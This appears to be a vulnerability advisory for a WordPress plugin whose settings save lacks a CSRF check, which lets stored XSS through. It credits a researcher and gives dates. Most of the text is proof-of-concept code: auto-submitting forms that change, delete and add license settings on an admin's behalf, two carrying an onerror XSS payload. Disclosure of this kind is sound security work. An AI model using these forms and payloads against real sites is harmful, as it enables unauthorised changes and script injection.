The plugin is lacking any CSRF check when saving its settings, which could allow attackers to make a logged in admin change them. Furthermore, as the plugin allows arbitrary HTML to be inserted in one of the settings, this could lead to Stored XSS issue which will be triggered in the frontend as well.
<form id="test" action="https://example.com/wp-admin/options-general.php" method="POST"> <input type="text" name="acc_data[timeframe_1][duration]" value="0"> <input type="text" name="acc_data[timeframe_1][key]" value="test"> <input type="text" name="acc_data[timeframe_expire][key]" value="none"> <input type="text" name="show_images" value="yes"> <input type="text" name="acc_action" value="update_settings"> <input type="text" name="acc_infinity" value="∞"> <input type="text" name="submit" value="Update License Settings"> </form> <script> HTMLFormElement.prototype.submit.call( document.getElementById("test") ); </script> <form id="test" action="https://example.com/wp-admin/options-general.php" method="POST"> <input type="text" name="acc_license[name]" value="test"> <input type="text" name="acc_license[url]" value=""> <input type="text" name="acc_license[image]" value=""> <input type="text" name="acc_license[rdf]" value="--><img src=x onerror=alert(1)>"> <input type="text" name="acc_action" value="edited"> <input type="text" name="acc_license_key" value="test"> <input type="text" name="submit" value="Save Changes"> </form> <script> HTMLFormElement.prototype.submit.call( document.getElementById("test") ); </script> <form id="test" action="https://example.com/wp-admin/options-general.php" method="POST"> <input type="text" name="delete_license" value="Delete"> <input type="text" name="acc_license_key" value="test2"> <input type="text" name="acc_action" value="delete"> </form> <script> document.getElementById("test").submit(); </script> <form id="test" action="https://example.com/wp-admin/options-general.php" method="POST"> <input type="text" name="acc_license[name]" value="bbb"> <input type="text" name="acc_license[url]" value=""> <input type="text" name="acc_license[image]" value=""> <input type="text" name="acc_license[rdf]" value="--><img src=x onerror=alert(1)>"> <input type="text" name="acc_action" value="add"> <input type="text" name="submit" value="Submit New License"> </form> <script> HTMLFormElement.prototype.submit.call( document.getElementById("test") ); </script>
Daniel Ruf
Daniel Ruf
Yes
2022-07-07 (about 11 months ago)
2022-07-07 (about 11 months ago)
2023-04-10 (about 1 months ago)